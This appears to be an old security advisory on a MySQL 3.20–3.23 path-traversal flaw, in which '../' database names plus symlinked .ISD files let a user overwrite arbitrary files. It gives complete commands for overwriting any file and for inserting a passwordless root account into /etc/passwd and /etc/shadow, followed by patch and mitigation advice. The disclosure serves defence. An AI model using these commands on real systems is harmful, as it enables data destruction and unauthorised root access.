COMMAND
MySQL
SYSTEMS AFFECTED
MySQL 3.20.32a (and others)... 3.23
PROBLEM
Lesha Pavlov found following. Anybody, who get login and password
to mysql can use it as DoS or r00t exploit because mysql accepts
'../blah-blah' as valid database name and each table represented
by 3 files tablename.ISD, tablename.ISM and tablename.frm. But,
when mysqld checks table already exists or not exists, it checks
_only_ tablename.frm.
Usage this "vulnerable features of mysql" to make big DoS (will
overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.
Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!
This DoS/exploit tested on mysql-3.20.32a but other versions of
mysql are also vulnerabile.
This could affect RedHat's RPMs for Red Hat PowerTools 6.1 and 6.2
which used an ancient version of MySQL: It was the only version
of MySQL with a free license (they were allowed to distribute
newer versions, but chose not to because of their license).
The one shipped with Red Hat Linux 7, after MySQL changed their
standard license, is not affected as they don't run as root.
SOLUTION
* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as
incorrect database names.
* And Main recomendation - do not run mysqld as root!!!
chowns existing database tables to a normal user and run mysqld
as this unprivileged user - it will be better solution!